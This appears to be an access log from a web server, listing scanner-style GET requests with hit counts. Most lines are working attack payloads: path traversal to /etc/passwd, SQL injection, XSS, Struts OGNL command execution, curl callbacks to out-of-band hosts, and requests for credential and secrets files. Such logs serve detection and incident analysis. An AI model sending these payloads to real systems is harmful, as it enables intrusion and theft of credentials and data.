1 | GET | /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences |
HTTP/1.1 |
1 | GET | /css_parser.php?css=css_parser.php |
HTTP/1.1 |
1 | GET | /cxcum/ |
HTTP/1.1 |
1 | GET | /cxwebclient/Login.aspx |
HTTP/1.1 |
1 | GET | /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C |
HTTP/1.1 |
1 | GET | /darkstat/ |
HTTP/1.1 |
1 | GET | /dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.aspx/Desktopmodules/Admin/dnnWerk.Users/DialogHandler.aspx?dp=1 |
HTTP/1.1 |
1 | GET | /dashboard/ |
HTTP/1.1 |
1 | GET | /dashboard/snapshot/%257B%257Bconstructor.constructor%28%2527alert%28document.domain%29%2527%29%28%29%257D%257D?orgId=1 |
HTTP/1.1 |
1 | GET | /data/autosuggest-remote.php?q=\"><img%20src=x%20onerror=alert(1)> |
HTTP/1.1 |
1 | GET | /data?get=prodServerGen |
HTTP/1.1 |
1 | GET | /database_credentials.inc |
HTTP/1.1 |
1 | GET | /db/server_import.php |
HTTP/1.1 |
1 | GET | /default.htm |
HTTP/1.1 |
1 | GET | /desktop/container/landing.jsp?locale=en_US |
HTTP/1.1 |
1 | GET | /desktopmodules/dnnwerk.radeditorprovider/dialoghandler.aspx?dp=1 |
HTTP/1.1 |
1 | GET | /desktopmodules/telerikwebui/radeditorprovider/telerik.web.ui.dialoghandler.aspx?dp=1 |
HTTP/1.1 |
1 | GET | /dev/tests/functional/credentials.xml.dist |
HTTP/1.1 |
1 | GET | /dev/tests/functional/etc/config.xml.dist |
HTTP/1.1 |
1 | GET | /development.log |
HTTP/1.1 |
1 | GET | /devices.inc.php?search=True&searchColumn=n.id&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchOption=contains |
HTTP/1.1 |
1 | GET | /dms/admin/accounts/payment_history.php?account_id=2%27 |
HTTP/1.1 |
1 | GET | /docker-cloud.yml |
HTTP/1.1 |
1 | GET | /docs |
HTTP/1.1 |
1 | GET | /documentation/login |
HTTP/1.1 |
1 | GET | /documentation |
HTTP/1.1 |
1 | GET | /dokuwiki/doku.php?at=<svg%20onload=alert(document.domain)>&id=wiki:welcome |
HTTP/1.1 |
1 | GET | /download.php?file=../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /dumpmdm.cmd |
HTTP/1.1 |
1 | GET | /elFinder/php/connector.minimal.php?cmd=mkfile&name=2Lw00cfdQeJqer4UatCMvyloIve[.]php:aaa&target=l1_Lw |
HTTP/1.1 |
1 | GET | /email_passthrough.php?email_ID=1&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Finteract[.]sh&type=link |
HTTP/1.1 |
1 | GET | /emergency.php |
HTTP/1.1 |
1 | GET | /en/WEB-INF/web.xml;.js |
HTTP/1.1 |
1 | GET | /env.dev.js |
HTTP/1.1 |
1 | GET | /env.development.js |
HTTP/1.1 |
1 | GET | /env.js |
HTTP/1.1 |
1 | GET | /env.prod.js |
HTTP/1.1 |
1 | GET | /env.production.js |
HTTP/1.1 |
1 | GET | /env.test.js |
HTTP/1.1 |
1 | GET | /error.php?SERVER_NAME=<script>alert(document.domain)</script> |
HTTP/1.1 |
1 | GET | /error3?data='alert('nuclei')//&msg=30 |
HTTP/1.1 |
1 | GET | /etc....4.2.1....json |
HTTP/1.1 |
1 | GET | /etc.1.json |
HTTP/1.1 |
1 | GET | /etc.children....4.2.1....json |
HTTP/1.1 |
1 | GET | /etc.children.1.json |
HTTP/1.1 |
1 | GET | /etc.children.json/FNZ.css |
HTTP/1.1 |
1 | GET | /etc.children.json/FNZ.html |
HTTP/1.1 |
1 | GET | /etc.children.json/FNZ.ico |
HTTP/1.1 |
1 | GET | /etc.children.json/FNZ.png |
HTTP/1.1 |
1 | GET | /etc.children.json?FNZ.css |
HTTP/1.1 |
1 | GET | /etc.children.json?FNZ.html |
HTTP/1.1 |
1 | GET | /etc.children.json?FNZ.ico |
HTTP/1.1 |
1 | GET | /etc.children.json |
HTTP/1.1 |
1 | GET | /etc.json/FNZ.css |
HTTP/1.1 |
1 | GET | /etc.json/FNZ.html |
HTTP/1.1 |
1 | GET | /etc.json/FNZ.ico |
HTTP/1.1 |
1 | GET | /etc.json?FNZ.css |
HTTP/1.1 |
1 | GET | /etc.json?FNZ.html |
HTTP/1.1 |
1 | GET | /etc.json?FNZ.ico |
HTTP/1.1 |
1 | GET | /etc.json |
HTTP/1.1 |
1 | GET | /etc/acs-commons/jcr-compare.html |
HTTP/1.1 |
1 | GET | /etc/acs-commons/oak-index-manager.html |
HTTP/1.1 |
1 | GET | /etc/acs-commons/version-compare.html |
HTTP/1.1 |
1 | GET | /etc/acs-commons/workflow-remover.html |
HTTP/1.1 |
1 | GET | /etc/passwd |
HTTP/1.1 |
1 | GET | /etc/reports/diskusage.html?path=/content/dam |
HTTP/1.1 |
1 | GET | /etc/reports/diskusage.html |
HTTP/1.1 |
1 | GET | /etc |
HTTP/1.1 |
1 | GET | /examples/jsp/security/protected/index.jsp |
HTTP/1.1 |
1 | GET | /explore/snippets |
HTTP/1.1 |
7 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /fed.rpc.solo.io.GlooInstanceApi/ListClusterDetails |
HTTP/1.1 |
1 | GET | /file=C:%255CWindows%255Cwin.ini |
HTTP/1.1 |
1 | GET | /filemanager/ajax_calls.php?action=get_file&file=../../../../etc/passwd&preview_mode=text&sub_action=preview&title=source |
HTTP/1.1 |
1 | GET | /fmangersub?cpath=../../../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /fpui/jsp/login.jsp |
HTTP/1.1 |
1 | GET | /freepbx/recordings/theme/main.css |
HTTP/1.1 |
1 | GET | /ftpsync.settings |
HTTP/1.1 |
1 | GET | /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27 |
HTTP/1.1 |
1 | GET | /fw/mindex.do?url=./WEB-INF/web.xml%3f |
HTTP/1.1 |
1 | GET | /gespage/webapp/login.xhtml |
HTTP/1.1 |
1 | GET | /git/notifyCommit?branches=2Lw00Ia9704exYMlHJmQVPxLMDy&url=2Lw00Ia9704exYMlHJmQVPxLMDy |
HTTP/1.1 |
1 | GET | /glpi/status.php |
HTTP/1.1 |
1 | GET | /glpi2/status.php |
HTTP/1.1 |
1 | GET | /go/add-on/business-continuity/api/cruise_config |
HTTP/1.1 |
1 | GET | /go/add-on/business-continuity/api/plugin?folderName&pluginName=../../../etc/passwd |
HTTP/1.1 |
1 | GET | /go/admin/pipelines/create?group=defaultGroup |
HTTP/1.1 |
1 | GET | /goform/activate_process?akey&count=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&hostid&isv |
HTTP/1.1 |
1 | GET | /google-services.json |
HTTP/1.1 |
1 | GET | /graph_realtime.php?action=init |
HTTP/1.1 |
1 | GET | /graphql?query={__typename} |
HTTP/1.1 |
1 | GET | /heapdump |
HTTP/1.1 |
1 | GET | /help/english/index.html?javascript:alert(document.domain) |
HTTP/1.1 |
1 | GET | /home.asp |
HTTP/1.1 |
1 | GET | /home |
HTTP/1.1 |
1 | GET | /horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00 |
HTTP/1.1 |
1 | GET | /hoteldruid/inizio.php |
HTTP/1.1 |
1 | GET | /hoteldruid/visualizza_tabelle.php?anno=2019&cambia1=3134671%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&cerca_id_passati=1&id_sessione&num_cambia_pren=1&subtotale_selezionate=1&tipo_tabella=prenotazioni |
HTTP/1.1 |
1 | GET | /hp/device/this.LCDispatcher |
HTTP/1.1 |
1 | GET | /hp/device/webAccess/index.htm?content=security |
HTTP/1.1 |
1 | GET | /hsqldb%250a |
HTTP/1.1 |
1 | GET | /html/index.html |
HTTP/1.1 |
1 | GET | /html/login.html |
HTTP/1.1 |
1 | GET | /html/repository |
HTTP/1.1 |
1 | GET | /http[:]//13[.]67[.]44[.]234/apisix/admin/migrate/export |
HTTP/1.1 |
1 | GET | /http[:]//13[.]67[.]44[.]234/http:/13.67.44.234/robots.txt |
HTTP/1.1 |
1 | GET | /http[:]//13[.]67[.]44[.]234/robots.txt |
HTTP/1.1 |
1 | GET | /hui/index.html |
HTTP/1.1 |
1 | GET | /idp/profile/oidc/authorize?client_id=demo_rp&request_uri=https[:]//cfoshuv52mup8baf1ho0bazmhm5nodzkq[.]oast[.]fun |
HTTP/1.1 |
1 | GET | /images/json |
HTTP/1.1 |
1 | GET | /includes/mysql2i/mysql2i.func.php |
HTTP/1.1 |
1 | GET | /index.action?cmd=cat%20/etc/passwd&encoding=UTF-8&method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java[.]util[.]Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20 |
HTTP/1.1 |
1 | GET | /index.action |
HTTP/1.1 |
1 | GET | /index.asp |
HTTP/1.1 |
2 | GET | /index.html |
HTTP/1.1 |
1 | GET | /index.php/System/MailConnect/host/cfoshuv52mup8baf1ho0xwk7mzpyh7t6p.oast.fun/port/80/secure/ |
HTTP/1.1 |
1 | GET | /index.php/catalogsearch/advanced/result/?name=e |
HTTP/1.1 |
1 | GET | /index.php/install/ |
HTTP/1.1 |
1 | GET | /index.php/install |
HTTP/1.1 |
1 | GET | /index.php?%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&action=Login&module=Users&print=a |
HTTP/1.1 |
1 | GET | /index.php?action=../../../../../../../../etc/passwd&option=com_agora&page=avatars&task=profile |
HTTP/1.1 |
1 | GET | /index.php?action=Login&module=Users |
HTTP/1.1 |
1 | GET | /index.php?action=edit&f1=.//./\\.//./\\.//./\\.//./\\.//./\\.//./etc/passwd&page&restore=1 |
HTTP/1.1 |
1 | GET | /index.php?app=main&inc=core_auth&route=login |
HTTP/1.1 |
1 | GET | /index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../../../../../../../../etc/passwd%00&option=com_communitypolls |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../../../../../../../../etc/passwd%00&option=com_mscomment |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../../../../../../../../etc/passwd%00&option=com_vjdeo |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../../../../../etc/passwd%00&option=com_kp |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_advertising |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_ckforms |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_hsconfig |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_joomlaflickr |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_multiroot |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../../etc/passwd%00&option=com_smestorage |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../../etc/passwd%00&option=com_wmi |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../../etc/passwd&option=com_kif_nexus |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../etc/passwd%00&option=com_dwgraphs |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../../../../etc/passwd&option=com_cartweberp |
HTTP/1.1 |
1 | GET | /index.php?controller=../../../../../etc/passwd%00&option=com_canteen |
HTTP/1.1 |
1 | GET | /index.php?controller=CommentGrade&fc=module&id_products%5B%5D=(select*from(select(sleep(6)))a)&module=productcomments |
HTTP/1.1 |
1 | GET | /index.php?debug_host=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_debug=1 |
HTTP/1.1 |
1 | GET | /index.php?folder=../../../../etc/passwd&option=com_imagebrowser |
HTTP/1.1 |
1 | GET | /index.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1 |
HTTP/1.1 |
1 | GET | /index.php?include_file=../../../../../../etc/passwd&option=com_pro_desk |
HTTP/1.1 |
1 | GET | /index.php?module=Install&view=Index |
HTTP/1.1 |
1 | GET | /index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00 |
HTTP/1.1 |
1 | GET | /index.php?option=com_jejob&view=../../../../../../etc/passwd%00 |
HTTP/1.1 |
1 | GET | /index.php?option=com_projectfork§ion=../../../../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00 |
HTTP/1.1 |
1 | GET | /index.php?p=%22alert(document.domain)%22&v=d |
HTTP/1.1 |
1 | GET | /index.php?r=i/../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /index.php?rest_route=/xs-donate-form/payment-redirect/3 |
HTTP/1.1 |
1 | GET | /index.php?s=/admin/Index/index |
HTTP/1.1 |
1 | GET | /index.php?sl=../../../../../../../etc/passwd%00 |
HTTP/1.1 |
1 | GET | /index.php |
HTTP/1.1 |
1 | GET | /index_en.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /index_sso.php |
HTTP/1.1 |
1 | GET | /inizio.php |
HTTP/1.1 |
1 | GET | /install/?step=1 |
HTTP/1.1 |
1 | GET | /install/ |
HTTP/1.1 |
1 | GET | /install/index.php |
HTTP/1.1 |
1 | GET | /install |
HTTP/1.1 |
1 | GET | /jbossass/jbossass.jsp?ppp=cat+%2Fetc%2Fpasswd |
HTTP/1.1 |
1 | GET | /jbossass/jbossass.jsp?ppp=type+C%3A%2FWindows%2Fwin.ini |
HTTP/1.1 |
1 | GET | /jbossws/services |
HTTP/1.1 |
1 | GET | /jexinv4/jexinv4.jsp?ppp=cat+%2Fetc%2Fpasswd |
HTTP/1.1 |
1 | GET | /jexinv4/jexinv4.jsp?ppp=type+C%3A%2FWindows%2Fwin.ini |
HTTP/1.1 |
1 | GET | /jexws/jexws.jsp?ppp=cat+%2Fetc%2Fpasswd |
HTTP/1.1 |
1 | GET | /jexws/jexws.jsp?ppp=type+C%3A%2FWindows%2Fwin.ini |
HTTP/1.1 |
1 | GET | /jexws4/jexws4.jsp?ppp=cat+%2Fetc%2Fpasswd |
HTTP/1.1 |
1 | GET | /jexws4/jexws4.jsp?ppp=type+C%3A%2FWindows%2Fwin.ini |
HTTP/1.1 |
1 | GET | /jobmanager/logs/..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252ftmp%25252fpoc |
HTTP/1.1 |
1 | GET | /jolokia/exec/ch[.]qos[.]logback[.]classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml |
HTTP/1.1 |
1 | GET | /jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName |
HTTP/1.1 |
1 | GET | /jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor |
HTTP/1.1 |
1 | GET | /jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion |
HTTP/1.1 |
1 | GET | /jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId |
HTTP/1.1 |
1 | GET | /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName |
HTTP/1.1 |
1 | GET | /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor |
HTTP/1.1 |
1 | GET | /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion |
HTTP/1.1 |
1 | GET | /jolokia/read/java[.]lang:type=Memory |
HTTP/1.1 |
1 | GET | /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select+547653*865674+as+id |
HTTP/1.1 |
1 | GET | /jw/web/; |
HTTP/1.1 |
1 | GET | /k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs |
HTTP/1.1 |
1 | GET | /karma.conf.js |
HTTP/1.1 |
1 | GET | /lab.html?vpath=//interact[.]sh |
HTTP/1.1 |
1 | GET | /lam/templates/login.php |
HTTP/1.1 |
1 | GET | /language/lang |
HTTP/1.1 |
1 | GET | /lib///....//....//....//....//....//....//....//....//etc//passwd |
HTTP/1.1 |
1 | GET | /lib/upgrade.txt |
HTTP/1.1 |
1 | GET | /libs/granite/core/content/login.html |
HTTP/1.1 |
1 | GET | /libs/granite/offloading/content/view.html |
HTTP/1.1 |
1 | GET | /log/development.log |
HTTP/1.1 |
1 | GET | /loggers |
HTTP/1.1 |
1 | GET | /login.aspx |
HTTP/1.1 |
1 | GET | /login.do |
HTTP/1.1 |
1 | GET | /login.htm |
HTTP/1.1 |
2 | GET | /login.html |
HTTP/1.1 |
1 | GET | /login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /login.php |
HTTP/1.1 |
1 | GET | /login.rsp |
HTTP/1.1 |
1 | GET | /login/ |
HTTP/1.1 |
1 | GET | /login/forgetpswd.php?loginname=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&loginsys=1 |
HTTP/1.1 |
1 | GET | /login/login.do |
HTTP/1.1 |
1 | GET | /login/login.htm |
HTTP/1.1 |
1 | GET | /login?loginUrl=%2Findex |
HTTP/1.1 |
1 | GET | /login?next=\\\\\\interact.sh |
HTTP/1.1 |
1 | GET | /login?redir=/ng |
HTTP/1.1 |
1 | GET | /login?redirectTo=/ |
HTTP/1.1 |
4 | GET | /login |
HTTP/1.1 |
1 | GET | /logon.htm |
HTTP/1.1 |
1 | GET | /logon/LogonPoint/tmindex.html |
HTTP/1.1 |
1 | GET | /logs/development.log |
HTTP/1.1 |
1 | GET | /lucee/lucees3ezf%253cimg%2520src%253da%2520onerror%253dalert%28%272Lw01c7usVasWo5bqNDWI4XDzJs%27%29%253elujb7/admin/imgProcess.cfm |
HTTP/1.1 |
1 | GET | /lucees3ezf%253cimg%2520src%253da%2520onerror%253dalert%28%272Lw01c7usVasWo5bqNDWI4XDzJs%27%29%253elujb7/admin/imgProcess.cfm |
HTTP/1.1 |
1 | GET | /magmi/web/info.php |
HTTP/1.1 |
1 | GET | /mailscanner/login.php |
HTTP/1.1 |
1 | GET | /mainfile.php?Logon=%27%3Becho%20md5(TestPoc)%3B%27&_login=1&password=testpoc&username=test |
HTTP/1.1 |
1 | GET | /maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00 |
HTTP/1.1 |
1 | GET | /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english |
HTTP/1.1 |
1 | GET | /man.cgi?B_mac_apply=APPLY&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port&TF_port&failure=fail.htm&http_block=0&redirect=setting.htm%0d%0a%0d%0a<script>alert(document.domain)</script>&type=dev_name_apply |
HTTP/1.1 |
1 | GET | /management |
HTTP/1.1 |
18 | GET | /manager/html |
HTTP/1.1 |
1 | GET | /manager/login.do |
HTTP/1.1 |
1 | GET | /mantis/verify.php?confirm_hash&id=1 |
HTTP/1.1 |
1 | GET | /mantisBT/verify.php?confirm_hash&id=1 |
HTTP/1.1 |
1 | GET | /mantisbt-2.3.0/verify.php?confirm_hash&id=1 |
HTTP/1.1 |
1 | GET | /mappings |
HTTP/1.1 |
1 | GET | /mcmadmin |
HTTP/1.1 |
1 | GET | /mdocs-posts/?mdocs-img-preview=../../../wp-config.php |
HTTP/1.1 |
1 | GET | /mediation/authenticate |
HTTP/1.1 |
1 | GET | /mediation/domains |
HTTP/1.1 |
2 | GET | /metadata/instance?api-version=2021-02-01 |
HTTP/1.1 |
2 | GET | /metrics |
HTTP/1.1 |
8 | GET | /miscadmin |
HTTP/1.1 |
1 | GET | /mobile.html |
HTTP/1.1 |
1 | GET | /module/smartblog/archive?day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-&month=1&year=1 |
HTTP/1.1 |
1 | GET | /my-account/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= |
HTTP/1.1 |
1 | GET | /mylittleadmin/ |
HTTP/1.1 |
1 | GET | /nagios3 |
HTTP/1.1 |
1 | GET | /nagios |
HTTP/1.1 |
1 | GET | /nagiosxi/login.php?redirect=/www.interact.sh |
HTTP/1.1 |
1 | GET | /namespaces |
HTTP/1.1 |
1 | GET | /navigate/login.php |
HTTP/1.1 |
1 | GET | /nbproject/project.properties |
HTTP/1.1 |
1 | GET | /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1 |
HTTP/1.1 |
1 | GET | /new/newhttp[:]//interact[.]sh |
HTTP/1.1 |
1 | GET | /nextcloud/index.php/login |
HTTP/1.1 |
1 | GET | /nextcloud/login |
HTTP/1.1 |
1 | GET | /nginx-status |
HTTP/1.1 |
1 | GET | /nginx_status |
HTTP/1.1 |
1 | GET | /npm-debug.log |
HTTP/1.1 |
1 | GET | /nuxeo/login.jsp |
HTTP/1.1 |
1 | GET | /oam/server/opensso/sessionservice |
HTTP/1.1 |
1 | GET | /oauth-credentials.json |
HTTP/1.1 |
1 | GET | /ocsreports |
HTTP/1.1 |
1 | GET | /omni_success?cmdb_edit_path=\")alert('nuclei')// |
HTTP/1.1 |
2 | GET | /opc/v1/instance |
HTTP/1.1 |
1 | GET | /openapi.json |
HTTP/1.1 |
1 | GET | /owa/auth/logon.aspx?replaceCurrent=1&url=http[:]//13[.]67[.]44[.]234/ecp |
HTTP/1.1 |
1 | GET | /owa/auth/x.js |
HTTP/1.1 |
1 | GET | /pages/sdcall/Login.jsp |
HTTP/1.1 |
1 | GET | /pagespeed-global-admin/ |
HTTP/1.1 |
1 | GET | /passport/index.php?action=manage&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mtype=userset |
HTTP/1.1 |
1 | GET | /pentaho/api/userrolelist/systemRoles?require-cfg.js |
HTTP/1.1 |
1 | GET | /php/connector.minimal.php?cmd=file&download=1&target=l1_Li8vLi4vLy4uLy8uLi8vLi4vLy4uLy8uLi9ldGMvcGFzc3dk |
HTTP/1.1 |
1 | GET | /php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22 |
HTTP/1.1 |
1 | GET | /phpMyAdmin%202/server_import.php |
HTTP/1.1 |
1 | GET | /phpMyAdmin/server_import.php |
HTTP/1.1 |
1 | GET | /phpmyadmin/server_import.php |
HTTP/1.1 |
1 | GET | /phpmyadmin/setup/index.php?id=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mode=test&page=servers |
HTTP/1.1 |
1 | GET | /phpspec.yml |
HTTP/1.1 |
1 | GET | /phpstan.neon |
HTTP/1.1 |
1 | GET | /phpwiki/index.php/passwd |
HTTP/1.1 |
1 | GET | /phy.htm |
HTTP/1.1 |
1 | GET | /plc/webvisu.htm |
HTTP/1.1 |
1 | GET | /plugins/weathermap/configs/poc.conf |
HTTP/1.1 |
1 | GET | /plugins/weathermap/editor.php?action=set_map_properties&debug=existing&link_bandwidth_in&link_bandwidth_out&link_hover&link_infourl&link_name&link_target&link_width&map_legend=Traffic+Load&map_linkdefaultwidth=7&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&mapname=poc.conf&node_hover&node_iconfilename=--NONE--&node_infourl&node_label&node_name&node_new_name&node_x&node_y¶m¶m2&plug=0 |
HTTP/1.1 |
1 | GET | /plus/ajax_common.php?act=hotword&query=aa%%e9%8c%a6%27%20union%20select%201,md5(999999999),3%23%27 |
HTTP/1.1 |
1 | GET | /pma/server_import.php |
HTTP/1.1 |
1 | GET | /pme/database/pme/phinx.yml |
HTTP/1.1 |
1 | GET | /pools/default/buckets |
HTTP/1.1 |
1 | GET | /portal/displayAPSForm.action?debug=command&expression=4212*6330 |
HTTP/1.1 |
1 | GET | /portal/favicon.ico |
HTTP/1.1 |
1 | GET | /portal/images/MyVue/MyVueHelp.png |
HTTP/1.1 |
1 | GET | /portal/info.jsp |
HTTP/1.1 |
1 | GET | /portal/portalhelp/en/ |
HTTP/1.1 |
1 | GET | /pre-commit-config.yaml |
HTTP/1.1 |
1 | GET | /printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E |
HTTP/1.1 |
1 | GET | /printer/objects/list |
HTTP/1.1 |
1 | GET | /processwire/ |
HTTP/1.1 |
1 | GET | /proftpd.conf |
HTTP/1.1 |
1 | GET | /provider.tf |
HTTP/1.1 |
2 | GET | /prweb/PRAuth/app/default/ |
HTTP/1.1 |
1 | GET | /pub/bscw.cgi/30?op=theme&style_name=../../../../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /public/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd |
HTTP/1.1 |
1 | GET | /public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /pubspec.yaml |
HTTP/1.1 |
1 | GET | /qmailadmin/qmailadmin.cgi |
HTTP/1.1 |
1 | GET | /query?db=db&q=SHOW%20DATABASES |
HTTP/1.1 |
1 | GET | /radiusmanager/user.php |
HTTP/1.1 |
1 | GET | /redirect-to?url=https%3A%2F%2Finteract[.]sh |
HTTP/1.1 |
1 | GET | /redmine/config/secrets.yml |
HTTP/1.1 |
1 | GET | /redoc |
HTTP/1.1 |
1 | GET | /remote_agent.php?action=polldata&host_id=1&local_data_ids[0]=1&poller_id=curl%20cfoshuv52mup8baf1ho0hsjifimt1ghhe.oast.fun/ whoami`` |
HTTP/1.1 |
1 | GET | /resin-doc/viewfile/?file=/WEB-INF/resin-web.xml |
HTTP/1.1 |
1 | GET | /responsiveUI/ |
HTTP/1.1 |
1 | GET | /responsiveUI/webmail/folder.xhtml |
HTTP/1.1 |
1 | GET | /rest/api/2/projectCategory?maxResults=1000 |
HTTP/1.1 |
1 | GET | /rest/api/2/user/picker?query |
HTTP/1.1 |
1 | GET | /rest/api/latest/serverInfo |
HTTP/1.1 |
1 | GET | /rest/config/1.0/directory |
HTTP/1.1 |
2 | GET | /robots.txt |
HTTP/1.1 |
1 | GET | /roundcube/logs/errors.log |
HTTP/1.1 |
1 | GET | /roundcube/logs/sendmail |
HTTP/1.1 |
1 | GET | /s/login |
HTTP/1.1 |
1 | GET | /s=set&_method=__construct&method=*&filter[]=system |
HTTP/1.1 |
1 | GET | /sap/bc/gui/sap/its/webgui |
HTTP/1.1 |
1 | GET | /sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html?saml2=disabled |
HTTP/1.1 |
1 | GET | /sap/public/info |
HTTP/1.1 |
1 | GET | /schema |
HTTP/1.1 |
1 | GET | /search.htm?searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&searchstring2 |
HTTP/1.1 |
1 | GET | /search/members/?id %3D520)%2f%2funion%2f%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%2770726f6a656374646973636f766572792e696f%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1` |
HTTP/1.1 |
1 | GET | /searchblox/servlet/FileServlet?col=9&url=/etc/passwd |
HTTP/1.1 |
1 | GET | /secrets.yml |
HTTP/1.1 |
1 | GET | /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd |
HTTP/1.1 |
1 | GET | /server_import.php |
HTTP/1.1 |
1 | GET | /service/ |
HTTP/1.1 |
1 | GET | /service/error/sfdc_preauth.jsp?server=http[:]//cfoshuv52mup8baf1ho0cgzrot179mweq[.]oast[.]fun%23.salesforce.com/&session=s&userid=1 |
HTTP/1.1 |
1 | GET | /servicedesk/customer/portal/10/user/login |
HTTP/1.1 |
1 | GET | /servicedesk/customer/user/login |
HTTP/1.1 |
1 | GET | /servlet/GetProductVersion |
HTTP/1.1 |
1 | GET | /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E |
HTTP/1.1 |
1 | GET | /settings |
HTTP/1.1 |
